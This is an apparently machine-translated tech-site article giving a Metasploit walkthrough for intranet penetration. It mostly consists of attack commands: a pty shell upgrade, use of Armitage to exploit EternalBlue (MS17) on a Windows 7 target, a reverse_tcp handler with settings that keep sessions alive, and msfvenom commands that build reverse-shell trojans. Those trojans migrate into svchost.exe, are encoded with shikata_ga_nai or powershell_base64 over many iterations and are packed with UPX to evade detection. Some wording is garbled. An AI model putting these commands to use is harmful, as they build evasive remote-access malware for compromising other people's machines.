Shulou(Shulou.com)06/03 Report--

This article mainly explains "how to solve the problem of intranet penetration". Interested friends may wish to have a look. The method introduced in this paper is simple, fast and practical. Let's let Xiaobian take you to learn "how to solve the problem of intranet penetration"!

11. - Several Ways to Improve Conversation

python -c "import pty;pty.spawn ('/bin/bash');" session elevation

session -u 4 Promotes shell session to meterpreter session

Modify the payload directly. The Trojan horse whose payload is shell can also be connected.

2. Armitage is familiar.

apt-get install armitage Installazione

Armitage Enter interface

You don't have to go straight in.

Select Quick Query

Enter the address you want to query

The hosts that survive from nmap are (1 is physical computer, 2 is gateway, 135 is linux target, 254 is broadcast address, 128 is win7 target, 129 is local)

Access denied Open Service Manager

with all the vulnerabilities.

Search MS17

move over

There is a loophole in Eternal Blue.

infiltration

Penetration successful

3. How to create a listener handler

handler -H 192.168.1.129 -P 4444 -p windows/meterpreter/reverse_tcp

4. Preventing conversation from suspended animation

show advanced Display advanced parameter settings

set ExitOnSession false The port continues listening after listening to the shell

set SessionCommunicationTimeout 0 Set the session lifetime, default 5 minutes

set SessionExpirationTimeout 0 Set the session lifetime, default one week

5. Console Settings Coding

EnableStageEncoding Whether to allow stage encoding

StageEncoder Sets the encoding to be used

Excellent coding: x86/shikata_ga_nai, cmd/powershell_base64

6. upx shell

Packers

upx -9 qq.exe

-1 compresses faster-9 compresses better

-d extract-l list zip file

-t Test compressed file-V Display version number

-h Give more help-L Show software licenses

Test whether compressed files can run

upx -t qq.com OK means it can run

back to top

7. msfvenom trojan payload persistence

(Will automatically migrate to svchost.exe when running Trojan)

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.129 lport=4444 PrependMigrate=true PrependMigrateProc=svchost.exe -f exe -o shell.exe

back to

8. msfvenom trojan code

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.227.129 lport=4444 -e cmd/powershell_base64 -i 14 -f exe -o shell.exe

At this point, I believe everyone has a deeper understanding of "how to solve the problem of intranet penetration". Let's do some actual operation! Here is the website, more related content can enter the relevant channels for inquiry, pay attention to us, continue to learn!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.